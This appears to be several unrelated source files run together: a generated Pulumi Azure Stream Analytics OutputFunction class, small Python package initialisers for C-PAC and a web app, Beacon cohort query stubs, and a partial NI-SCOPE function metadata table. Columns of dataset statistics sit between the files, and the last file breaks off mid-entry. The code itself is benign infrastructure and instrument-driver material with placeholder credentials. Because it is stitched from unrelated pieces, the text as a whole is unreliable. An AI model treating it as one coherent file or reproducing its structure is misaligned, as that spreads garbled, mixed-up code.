    def batch_max_in_bytes(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "batch_max_in_bytes", value)

    @property
    @pulumi.getter(name="functionApp")
    def function_app(self) -> Optional[pulumi.Input[str]]:
        """
        The name of the Function App.
        """
        return pulumi.get(self, "function_app")

    @function_app.setter
    def function_app(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "function_app", value)

    @property
    @pulumi.getter(name="functionName")
    def function_name(self) -> Optional[pulumi.Input[str]]:
        """
        The name of the function in the Function App.
        """
        return pulumi.get(self, "function_name")

    @function_name.setter
    def function_name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "function_name", value)

    @property
    @pulumi.getter
    def name(self) -> Optional[pulumi.Input[str]]:
        """
        The name which should be used for this Stream Analytics Output. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "name")

    @name.setter
    def name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "name", value)

    @property
    @pulumi.getter(name="resourceGroupName")
    def resource_group_name(self) -> Optional[pulumi.Input[str]]:
        """
        The name of the Resource Group where the Stream Analytics Output should exist. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "resource_group_name")

    @resource_group_name.setter
    def resource_group_name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "resource_group_name", value)

    @property
    @pulumi.getter(name="streamAnalyticsJobName")
    def stream_analytics_job_name(self) -> Optional[pulumi.Input[str]]:
        """
        The name of the Stream Analytics Job. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "stream_analytics_job_name")

    @stream_analytics_job_name.setter
    def stream_analytics_job_name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "stream_analytics_job_name", value)
class OutputFunction(pulumi.CustomResource):
    # Generated resource class; the two @overload __init__ signatures exist
    # only for type checkers — the real constructor dispatches to
    # _internal_init below.
    @overload
    def __init__(__self__,
                 resource_name: str,
                 opts: Optional[pulumi.ResourceOptions] = None,
                 api_key: Optional[pulumi.Input[str]] = None,
                 batch_max_count: Optional[pulumi.Input[int]] = None,
                 batch_max_in_bytes: Optional[pulumi.Input[int]] = None,
                 function_app: Optional[pulumi.Input[str]] = None,
                 function_name: Optional[pulumi.Input[str]] = None,
                 name: Optional[pulumi.Input[str]] = None,
                 resource_group_name: Optional[pulumi.Input[str]] = None,
                 stream_analytics_job_name: Optional[pulumi.Input[str]] = None,
                 __props__=None):
        """
        Manages a Stream Analytics Output Function.

        ## Example Usage

        ```python
        import pulumi
        import pulumi_azure as azure

        example_resource_group = azure.core.ResourceGroup("exampleResourceGroup")
        example_account = azure.storage.Account("exampleAccount",
            resource_group_name=example_resource_group.name,
            location=example_resource_group.location,
            account_tier="Standard",
            account_replication_type="LRS")
        example_plan = azure.appservice.Plan("examplePlan",
            location=example_resource_group.location,
            resource_group_name=example_resource_group.name,
            kind="FunctionApp",
            reserved=True,
            sku=azure.appservice.PlanSkuArgs(
                tier="Dynamic",
                size="Y1",
            ))
        example_function_app = azure.appservice.FunctionApp("exampleFunctionApp",
            location=example_resource_group.location,
            resource_group_name=example_resource_group.name,
            app_service_plan_id=example_plan.id,
            storage_account_name=example_account.name,
            storage_account_access_key=example_account.primary_access_key,
            os_type="linux",
            version="~3")
        example_job = azure.streamanalytics.Job("exampleJob",
            resource_group_name=example_resource_group.name,
            location=example_resource_group.location,
            streaming_units=3,
            transformation_query=\"\"\" SELECT *
        INTO [YourOutputAlias]
        FROM [YourInputAlias]
        \"\"\")
        example_output_function = azure.streamanalytics.OutputFunction("exampleOutputFunction",
            resource_group_name=example_job.resource_group_name,
            stream_analytics_job_name=example_job.name,
            function_app=example_function_app.name,
            function_name="examplefunctionname",
            api_key="exampleapikey")
        ```

        ## Import

        Stream Analytics Output Functions can be imported using the `resource id`, e.g.

        ```sh
        $ pulumi import azure:streamanalytics/outputFunction:OutputFunction example /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/group1/providers/Microsoft.StreamAnalytics/streamingjobs/job1/outputs/output1
        ```

        :param str resource_name: The name of the resource.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[str] api_key: The API key for the Function.
        :param pulumi.Input[int] batch_max_count: The maximum number of events in each batch that's sent to the function. Defaults to `100`.
        :param pulumi.Input[int] batch_max_in_bytes: The maximum batch size in bytes that's sent to the function. Defaults to `262144` (256 kB).
        :param pulumi.Input[str] function_app: The name of the Function App.
        :param pulumi.Input[str] function_name: The name of the function in the Function App.
        :param pulumi.Input[str] name: The name which should be used for this Stream Analytics Output. Changing this forces a new resource to be created.
        :param pulumi.Input[str] resource_group_name: The name of the Resource Group where the Stream Analytics Output should exist. Changing this forces a new resource to be created.
        :param pulumi.Input[str] stream_analytics_job_name: The name of the Stream Analytics Job. Changing this forces a new resource to be created.
        """
        ...

    @overload
    def __init__(__self__,
                 resource_name: str,
                 args: OutputFunctionArgs,
                 opts: Optional[pulumi.ResourceOptions] = None):
        """
        Manages a Stream Analytics Output Function.

        ## Example Usage

        ```python
        import pulumi
        import pulumi_azure as azure

        example_resource_group = azure.core.ResourceGroup("exampleResourceGroup")
        example_account = azure.storage.Account("exampleAccount",
            resource_group_name=example_resource_group.name,
            location=example_resource_group.location,
            account_tier="Standard",
            account_replication_type="LRS")
        example_plan = azure.appservice.Plan("examplePlan",
            location=example_resource_group.location,
            resource_group_name=example_resource_group.name,
            kind="FunctionApp",
            reserved=True,
            sku=azure.appservice.PlanSkuArgs(
                tier="Dynamic",
                size="Y1",
            ))
        example_function_app = azure.appservice.FunctionApp("exampleFunctionApp",
            location=example_resource_group.location,
            resource_group_name=example_resource_group.name,
            app_service_plan_id=example_plan.id,
            storage_account_name=example_account.name,
            storage_account_access_key=example_account.primary_access_key,
            os_type="linux",
            version="~3")
        example_job = azure.streamanalytics.Job("exampleJob",
            resource_group_name=example_resource_group.name,
            location=example_resource_group.location,
            streaming_units=3,
            transformation_query=\"\"\" SELECT *
        INTO [YourOutputAlias]
        FROM [YourInputAlias]
        \"\"\")
        example_output_function = azure.streamanalytics.OutputFunction("exampleOutputFunction",
            resource_group_name=example_job.resource_group_name,
            stream_analytics_job_name=example_job.name,
            function_app=example_function_app.name,
            function_name="examplefunctionname",
            api_key="exampleapikey")
        ```

        ## Import

        Stream Analytics Output Functions can be imported using the `resource id`, e.g.

        ```sh
        $ pulumi import azure:streamanalytics/outputFunction:OutputFunction example /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/group1/providers/Microsoft.StreamAnalytics/streamingjobs/job1/outputs/output1
        ```

        :param str resource_name: The name of the resource.
        :param OutputFunctionArgs args: The arguments to use to populate this resource's properties.
        :param pulumi.ResourceOptions opts: Options for the resource.
        """
        ...

    def __init__(__self__, resource_name: str, *args, **kwargs):
        # Resolve which overload was used (args-object vs. keyword form) and
        # forward to the single real initializer.
        resource_args, opts = _utilities.get_resource_args_opts(OutputFunctionArgs, pulumi.ResourceOptions, *args, **kwargs)
        if resource_args is not None:
            __self__._internal_init(resource_name, opts, **resource_args.__dict__)
        else:
            __self__._internal_init(resource_name, *args, **kwargs)

    def _internal_init(__self__,
                       resource_name: str,
                       opts: Optional[pulumi.ResourceOptions] = None,
                       api_key: Optional[pulumi.Input[str]] = None,
                       batch_max_count: Optional[pulumi.Input[int]] = None,
                       batch_max_in_bytes: Optional[pulumi.Input[int]] = None,
                       function_app: Optional[pulumi.Input[str]] = None,
                       function_name: Optional[pulumi.Input[str]] = None,
                       name: Optional[pulumi.Input[str]] = None,
                       resource_group_name: Optional[pulumi.Input[str]] = None,
                       stream_analytics_job_name: Optional[pulumi.Input[str]] = None,
                       __props__=None):
        if opts is None:
            opts = pulumi.ResourceOptions()
        if not isinstance(opts, pulumi.ResourceOptions):
            raise TypeError('Expected resource options to be a ResourceOptions instance')
        if opts.version is None:
            opts.version = _utilities.get_version()
        if opts.id is None:
            # Creating a new resource: __props__ may only be supplied together
            # with opts.id (i.e. when rehydrating an existing resource).
            if __props__ is not None:
                raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
            __props__ = OutputFunctionArgs.__new__(OutputFunctionArgs)
            # Missing required inputs are an error only when no URN is given;
            # with a URN the engine already knows the resource's state.
            if api_key is None and not opts.urn:
                raise TypeError("Missing required property 'api_key'")
            __props__.__dict__["api_key"] = api_key
            __props__.__dict__["batch_max_count"] = batch_max_count
            __props__.__dict__["batch_max_in_bytes"] = batch_max_in_bytes
            if function_app is None and not opts.urn:
                raise TypeError("Missing required property 'function_app'")
            __props__.__dict__["function_app"] = function_app
            if function_name is None and not opts.urn:
                raise TypeError("Missing required property 'function_name'")
            __props__.__dict__["function_name"] = function_name
            __props__.__dict__["name"] = name
            if resource_group_name is None and not opts.urn:
                raise TypeError("Missing required property 'resource_group_name'")
            __props__.__dict__["resource_group_name"] = resource_group_name
            if stream_analytics_job_name is None and not opts.urn:
                raise TypeError("Missing required property 'stream_analytics_job_name'")
            __props__.__dict__["stream_analytics_job_name"] = stream_analytics_job_name
        super(OutputFunction, __self__).__init__(
            'azure:streamanalytics/outputFunction:OutputFunction',
            resource_name,
            __props__,
            opts)

    @staticmethod
    def get(resource_name: str,
            id: pulumi.Input[str],
            opts: Optional[pulumi.ResourceOptions] = None,
            api_key: Optional[pulumi.Input[str]] = None,
            batch_max_count: Optional[pulumi.Input[int]] = None,
            batch_max_in_bytes: Optional[pulumi.Input[int]] = None,
            function_app: Optional[pulumi.Input[str]] = None,
            function_name: Optional[pulumi.Input[str]] = None,
            name: Optional[pulumi.Input[str]] = None,
            resource_group_name: Optional[pulumi.Input[str]] = None,
            stream_analytics_job_name: Optional[pulumi.Input[str]] = None) -> 'OutputFunction':
        """
        Get an existing OutputFunction resource's state with the given name, id, and optional extra
        properties used to qualify the lookup.

        :param str resource_name: The unique name of the resulting resource.
        :param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[str] api_key: The API key for the Function.
        :param pulumi.Input[int] batch_max_count: The maximum number of events in each batch that's sent to the function. Defaults to `100`.
        :param pulumi.Input[int] batch_max_in_bytes: The maximum batch size in bytes that's sent to the function. Defaults to `262144` (256 kB).
        :param pulumi.Input[str] function_app: The name of the Function App.
        :param pulumi.Input[str] function_name: The name of the function in the Function App.
        :param pulumi.Input[str] name: The name which should be used for this Stream Analytics Output. Changing this forces a new resource to be created.
        :param pulumi.Input[str] resource_group_name: The name of the Resource Group where the Stream Analytics Output should exist. Changing this forces a new resource to be created.
        :param pulumi.Input[str] stream_analytics_job_name: The name of the Stream Analytics Job. Changing this forces a new resource to be created.
        """
        opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
        __props__ = _OutputFunctionState.__new__(_OutputFunctionState)
        __props__.__dict__["api_key"] = api_key
        __props__.__dict__["batch_max_count"] = batch_max_count
        __props__.__dict__["batch_max_in_bytes"] = batch_max_in_bytes
        __props__.__dict__["function_app"] = function_app
        __props__.__dict__["function_name"] = function_name
        __props__.__dict__["name"] = name
        __props__.__dict__["resource_group_name"] = resource_group_name
        __props__.__dict__["stream_analytics_job_name"] = stream_analytics_job_name
        return OutputFunction(resource_name, opts=opts, __props__=__props__)

    @property
    @pulumi.getter(name="apiKey")
    def api_key(self) -> pulumi.Output[str]:
        """
        The API key for the Function.
        """
        return pulumi.get(self, "api_key")

    @property
    @pulumi.getter(name="batchMaxCount")
    def batch_max_count(self) -> pulumi.Output[Optional[int]]:
        """
        The maximum number of events in each batch that's sent to the function. Defaults to `100`.
        """
        return pulumi.get(self, "batch_max_count")

    @property
    @pulumi.getter(name="batchMaxInBytes")
    def batch_max_in_bytes(self) -> pulumi.Output[Optional[int]]:
        """
        The maximum batch size in bytes that's sent to the function. Defaults to `262144` (256 kB).
        """
        return pulumi.get(self, "batch_max_in_bytes")

    @property
    @pulumi.getter(name="functionApp")
    def function_app(self) -> pulumi.Output[str]:
        """
        The name of the Function App.
        """
        return pulumi.get(self, "function_app")

    @property
    @pulumi.getter(name="functionName")
    def function_name(self) -> pulumi.Output[str]:
        """
        The name of the function in the Function App.
        """
        return pulumi.get(self, "function_name")

    @property
    @pulumi.getter
    def name(self) -> pulumi.Output[str]:
        """
        The name which should be used for this Stream Analytics Output. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "name")

    @property
    @pulumi.getter(name="resourceGroupName")
    def resource_group_name(self) -> pulumi.Output[str]:
        """
        The name of the Resource Group where the Stream Analytics Output should exist. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "resource_group_name")

    @property
    @pulumi.getter(name="streamAnalyticsJobName")
    def stream_analytics_job_name(self) -> pulumi.Output[str]:
        """
        The name of the Stream Analytics Job. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "stream_analytics_job_name")
| 46.079932
| 229
| 0.660934
| 3,327
| 27,095
| 5.117523
| 0.06823
| 0.069776
| 0.065782
| 0.050394
| 0.90215
| 0.888054
| 0.881534
| 0.855633
| 0.848526
| 0.840068
| 0
| 0.007877
| 0.245691
| 27,095
| 587
| 230
| 46.158433
| 0.825179
| 0.391511
| 0
| 0.693878
| 1
| 0
| 0.120551
| 0.026487
| 0
| 0
| 0
| 0
| 0
| 1
| 0.159864
| false
| 0.003401
| 0.017007
| 0
| 0.272109
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a5008a61d570efdb7c452034087ca45eb10356c6
| 171
|
py
|
Python
|
CPAC/pipeline/__init__.py
|
Lawreros/C-PAC
|
ce26ba9a38cbd401cd405150eeed23b805007724
|
[
"BSD-3-Clause"
] | null | null | null |
CPAC/pipeline/__init__.py
|
Lawreros/C-PAC
|
ce26ba9a38cbd401cd405150eeed23b805007724
|
[
"BSD-3-Clause"
] | null | null | null |
CPAC/pipeline/__init__.py
|
Lawreros/C-PAC
|
ce26ba9a38cbd401cd405150eeed23b805007724
|
[
"BSD-3-Clause"
] | null | null | null |
# C-PAC pipeline package initializer: loads the pipeline-runner submodules.
from . import cpac_runner
from . import cpac_group_runner
from . import cpac_pipeline
from . import cpac_basc_pipeline
from . import cpac_cwas_pipeline
# NOTE(review): __all__ declares 'run', but no 'run' symbol is defined or
# imported in this module as shown — confirm whether a 'run' re-export
# (e.g. from cpac_runner) is missing or whether __all__ is stale.
__all__ = ['run']
| 21.375
| 32
| 0.80117
| 25
| 171
| 5
| 0.4
| 0.4
| 0.56
| 0.32
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.140351
| 171
| 7
| 33
| 24.428571
| 0.85034
| 0
| 0
| 0
| 0
| 0
| 0.017544
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.833333
| 0
| 0.833333
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
a5159aa1b231a842ec12fa13e72e88cd7531ac95
| 111
|
py
|
Python
|
web/__init__.py
|
Saphyel/recipes
|
b1b67ffe9ed5ddd27bc67a3887a8e9a82614e89a
|
[
"MIT"
] | null | null | null |
web/__init__.py
|
Saphyel/recipes
|
b1b67ffe9ed5ddd27bc67a3887a8e9a82614e89a
|
[
"MIT"
] | null | null | null |
web/__init__.py
|
Saphyel/recipes
|
b1b67ffe9ed5ddd27bc67a3887a8e9a82614e89a
|
[
"MIT"
] | null | null | null |
# Web package initializer: imports the router object of each sub-module.
# NOTE(review): each successive import rebinds the same name 'router', so
# after this module executes only the 'recipes' router is reachable as
# 'web.router'; the earlier imports matter only for loading their modules.
# Confirm whether distinct aliases (e.g. 'about_router') were intended.
from .about import router
from .categories import router
from .chefs import router
from .recipes import router
| 22.2
| 30
| 0.81982
| 16
| 111
| 5.6875
| 0.4375
| 0.527473
| 0.527473
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.144144
| 111
| 4
| 31
| 27.75
| 0.957895
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
ebbfb7892a8ef70527df0d12e36ad7ae6ed1a59b
| 1,368
|
py
|
Python
|
beacon/db/cohorts.py
|
elixir-luxembourg/BH2021-beacon-2.x-omop
|
d811e7902909f5d38f9a5964ff0ff3335ec0056a
|
[
"Apache-2.0"
] | null | null | null |
beacon/db/cohorts.py
|
elixir-luxembourg/BH2021-beacon-2.x-omop
|
d811e7902909f5d38f9a5964ff0ff3335ec0056a
|
[
"Apache-2.0"
] | null | null | null |
beacon/db/cohorts.py
|
elixir-luxembourg/BH2021-beacon-2.x-omop
|
d811e7902909f5d38f9a5964ff0ff3335ec0056a
|
[
"Apache-2.0"
] | null | null | null |
from beacon.db.filters import apply_filters
from beacon.db.utils import query_id
from beacon.request.model import RequestParams
from beacon.db import client
def get_cohorts(entry_id: str, qparams: RequestParams):
    """Return a paginated cursor over the cohorts collection.

    The request's filters are translated into a query via ``apply_filters``;
    pagination (skip/limit) comes from the request's query parameters.
    ``entry_id`` is accepted for interface symmetry but not used here.
    """
    cohort_query = apply_filters({}, qparams.query.filters)
    pagination = qparams.query.pagination
    cursor = client.beacon.cohorts.find(cohort_query)
    return cursor.skip(pagination.skip).limit(pagination.limit)
def get_cohort_with_id(entry_id: str, qparams: RequestParams):
    """Return a paginated cursor over cohorts narrowed to ``entry_id``.

    Builds the same filter query as ``get_cohorts`` and then constrains it
    to the requested id via ``query_id`` before applying pagination.
    """
    cohort_query = apply_filters({}, qparams.query.filters)
    cohort_query = query_id(cohort_query, entry_id)
    pagination = qparams.query.pagination
    return (client.beacon.cohorts
            .find(cohort_query)
            .skip(pagination.skip)
            .limit(pagination.limit))
def get_individuals_of_cohort(entry_id: str, qparams: RequestParams):
    """Unimplemented: retrieve the individuals belonging to a cohort."""
    # TODO
    pass
def get_filtering_terms_of_cohort(entry_id: str, qparams: RequestParams):
    """Unimplemented: retrieve the filtering terms applicable to a cohort."""
    # TODO
    pass
def get_variants_of_cohort(entry_id: str, qparams: RequestParams):
    """Unimplemented: retrieve the variants of a cohort."""
    # TODO: To be fixed in the model
    pass
def get_biosamples_of_cohort(entry_id: str, qparams: RequestParams):
    """Unimplemented: retrieve the biosamples of a cohort."""
    # TODO: To be fixed in the model
    pass
def get_runs_of_cohort(entry_id: str, qparams: RequestParams):
    """Unimplemented: retrieve the sequencing runs of a cohort."""
    # TODO: To be fixed in the model
    pass
def get_analyses_of_cohort(entry_id: str, qparams: RequestParams):
    """Unimplemented: retrieve the analyses of a cohort."""
    # TODO: To be fixed in the model
    pass
| 26.307692
| 73
| 0.724415
| 190
| 1,368
| 5.021053
| 0.215789
| 0.066038
| 0.083857
| 0.142558
| 0.752621
| 0.752621
| 0.752621
| 0.752621
| 0.752621
| 0.752621
| 0
| 0
| 0.184211
| 1,368
| 51
| 74
| 26.823529
| 0.854839
| 0.097222
| 0
| 0.551724
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.019608
| 0
| 1
| 0.275862
| false
| 0.206897
| 0.137931
| 0
| 0.482759
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
ebc011bbe0ce6a5a1786929f9db21a7d001f283b
| 312,963
|
py
|
Python
|
src/niscope/metadata/functions.py
|
WhiteLupus/nimi-python
|
4e05b9a64f08ed2c929932d8d586c7114c46cf04
|
[
"MIT"
] | 1
|
2019-09-18T14:28:47.000Z
|
2019-09-18T14:28:47.000Z
|
src/niscope/metadata/functions.py
|
WhiteLupus/nimi-python
|
4e05b9a64f08ed2c929932d8d586c7114c46cf04
|
[
"MIT"
] | null | null | null |
src/niscope/metadata/functions.py
|
WhiteLupus/nimi-python
|
4e05b9a64f08ed2c929932d8d586c7114c46cf04
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# This file is generated from NI-SCOPE API metadata version 19.1.0d50
functions = {
'Abort': {
'documentation': {
'description': '\nAborts an acquisition and returns the digitizer to the Idle state. Call\nthis function if the digitizer times out waiting for a trigger.\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
}
],
'returns': 'ViStatus'
},
'AcquisitionStatus': {
'documentation': {
'description': '\nReturns status information about the acquisition to the **status**\noutput parameter.\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'out',
'documentation': {
'description': '\nReturns whether the acquisition is complete, in progress, or unknown.\n\n**Defined Values**\n\nNISCOPE_VAL_ACQ_COMPLETE\n\nNISCOPE_VAL_ACQ_IN_PROGRESS\n\nNISCOPE_VAL_ACQ_STATUS_UNKNOWN\n'
},
'enum': 'AcquisitionStatus',
'name': 'acquisitionStatus',
'type': 'ViInt32'
}
],
'returns': 'ViStatus'
},
'ActualMeasWfmSize': {
'codegen_method': 'private',
'documentation': {
'description': 'Returns the total available size of an array measurement acquisition.'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': '\nThe `array\nmeasurement <REPLACE_DRIVER_SPECIFIC_URL_2(array_measurements_refs)>`__\nto perform.\n'
},
'enum': 'ArrayMeasurement',
'name': 'arrayMeasFunction',
'type': 'ViInt32'
},
{
'direction': 'out',
'documentation': {
'description': '\nReturns the size (in number of samples) of the resulting analysis\nwaveform.\n'
},
'name': 'measWaveformSize',
'type': 'ViInt32'
}
],
'render_in_session_base': True,
'returns': 'ViStatus'
},
'ActualNumWfms': {
'codegen_method': 'private',
'documentation': {
'description': '\nHelps you to declare appropriately sized waveforms. NI-SCOPE handles the\nchannel list parsing for you.\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': "\nThe channel to configure. For more information, refer to `Channel String\nSyntax <REPLACE_DRIVER_SPECIFIC_URL_2(scopefunc.chm','cvichannelstringsyntaxforc)>`__.\n"
},
'name': 'channelList',
'type': 'ViConstString'
},
{
'direction': 'out',
'documentation': {
'description': '\nReturns the number of records times the number of channels; if you are\noperating in DDC mode (NI 5620/5621 only), this value is multiplied by\ntwo.\n'
},
'name': 'numWfms',
'type': 'ViInt32'
}
],
'returns': 'ViStatus'
},
'ActualRecordLength': {
'codegen_method': 'no',
'documentation': {
'description': '\nReturns the actual number of points the digitizer acquires for each\nchannel. After configuring the digitizer for an acquisition, call this\nfunction to determine the size of the waveforms that the digitizer\nacquires. The value is equal to or greater than the minimum number of\npoints specified in any of the Configure Horizontal functions.\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'out',
'documentation': {
'description': '\nReturns the actual number of points the digitizer acquires for each\nchannel; NI-SCOPE returns the value held in the\nNISCOPE_ATTR_HORZ_RECORD_LENGTH attribute.\n'
},
'name': 'recordLength',
'type': 'ViInt32'
}
],
'returns': 'ViStatus'
},
'AddWaveformProcessing': {
'codegen_method': 'private',
'documentation': {
'description': '\nAdds one measurement to the list of processing steps that are completed\nbefore the measurement. The processing is added on a per channel basis,\nand the processing measurements are completed in the same order they are\nregistered. All measurement library parameters—the attributes starting\nwith NISCOPE_ATTR_MEAS—are cached at the time of registering the\nprocessing, and this set of parameters is used during the processing\nstep. The processing measurements are streamed, so the result of the\nfirst processing step is used as the input for the next step. The\nprocessing is done before any other measurements.\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': "\nThe channel to configure. For more information, refer to `Channel String\nSyntax <REPLACE_DRIVER_SPECIFIC_URL_2(scopefunc.chm','cvichannelstringsyntaxforc)>`__.\n"
},
'name': 'channelList',
'type': 'ViConstString'
},
{
'direction': 'in',
'documentation': {
'description': '\nThe `array\nmeasurement <REPLACE_DRIVER_SPECIFIC_URL_2(array_measurements_refs)>`__\nto add.\n'
},
'enum': 'ArrayMeasurement',
'name': 'measFunction',
'type': 'ViInt32'
}
],
'returns': 'ViStatus'
},
'AdjustSampleClockRelativeDelay': {
'codegen_method': 'no',
'documentation': {
'description': '\nConfigures the relative sample clock delay (in seconds) when using the\ninternal clock. Each time this function is called, the sample clock is\ndelayed from the reference clock by the specified amount of time.\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': '\nHow long the digitizer waits after receiving the trigger to start\nacquiring data. Refer to NISCOPE_ATTR_TRIGGER_DELAY_TIME for more\ninformation.\n'
},
'name': 'delay',
'type': 'ViReal64'
}
],
'returns': 'ViStatus'
},
'AutoSetup': {
'documentation': {
'description': '\nAutomatically configures the instrument. When you call this function,\nthe digitizer senses the input signal and automatically configures many\nof the instrument settings. If a signal is detected on a channel, the\ndriver chooses the smallest available vertical range that is larger than\nthe signal range. For example, if the signal is a 1.2 V\\ :sub:`pk-pk`\nsine wave, and the device supports 1 V and 2 V vertical ranges, the\ndriver will choose the 2 V vertical range for that channel.\n\nIf no signal is found on any analog input channel, a warning is\nreturned, and all channels are enabled. A channel is considered to have\na signal present if the signal is at least 10% of the smallest vertical\nrange available for that channel.\n\nThe following settings are changed:\n',
'table_body': [
[
'**General**'
],
[
'Acquisition mode',
'Normal'
],
[
'Reference clock',
'Internal'
],
[
'**Vertical**'
],
[
'Vertical coupling',
'AC (DC for NI 5621)'
],
[
'Vertical bandwidth',
'Full'
],
[
'Vertical range',
'Changed by auto setup'
],
[
'Vertical offset',
'0 V'
],
[
'Probe attenuation',
'Unchanged by auto setup'
],
[
'Input impedance',
'Unchanged by auto setup'
],
[
'**Horizontal**'
],
[
'Sample rate',
'Changed by auto setup'
],
[
'Min record length',
'Changed by auto setup'
],
[
'Enforce realtime',
'True'
],
[
'Number of Records',
'Changed to 1'
],
[
'**Triggering**'
],
[
'Trigger type',
'Edge if signal present, otherwise immediate'
],
[
'Trigger channel',
'Lowest numbered channel with a signal present'
],
[
'Trigger slope',
'Positive'
],
[
'Trigger coupling',
'DC'
],
[
'Reference position',
'50%'
],
[
'Trigger level',
'50% of signal on trigger channel'
],
[
'Trigger delay',
'0'
],
[
'Trigger holdoff',
'0'
],
[
'Trigger output',
'None'
]
]
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
}
],
'returns': 'ViStatus'
},
'CableSenseSignalStart': {
'codegen_method': 'no',
'documentation': {
'description': '\nGenerates the CableSense signal on all channels of an oscilloscope for which the signal is enabled, as configured by the CableSense Mode property.\n',
'note': 'You can call this VI only during an acquisition. If you call this VI while your oscilloscope is not acquiring, NI‑SCOPE generates an error.',
'table_body': [
[
'**Supported Devices**'
],
[
'PXIe-5110'
],
[
'PXIe-5111'
],
[
'PXIe-5113'
],
[
'PXIe-5160'
],
[
'PXIe-5162'
]
]
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
}
],
'returns': 'ViStatus'
},
'CableSenseSignalStop': {
'codegen_method': 'no',
'documentation': {
'description': '\nDisables the CableSense signal on all channels of an oscilloscope for which the signal is enabled.\n',
'table_body': [
[
'**Supported Devices**'
],
[
'PXIe-5110'
],
[
'PXIe-5111'
],
[
'PXIe-5113'
],
[
'PXIe-5160'
],
[
'PXIe-5162'
]
]
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
}
],
'returns': 'ViStatus'
},
'CalGetAdcVoltageEeprom': {
'codegen_method': 'no',
'documentation': {
'description': 'TBD'
},
'parameters': [
{
'direction': 'in',
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'out',
'name': 'adcVoltageGain',
'type': 'ViReal32'
},
{
'direction': 'out',
'name': 'adcVoltageOffset',
'type': 'ViReal32'
}
],
'returns': 'ViStatus'
},
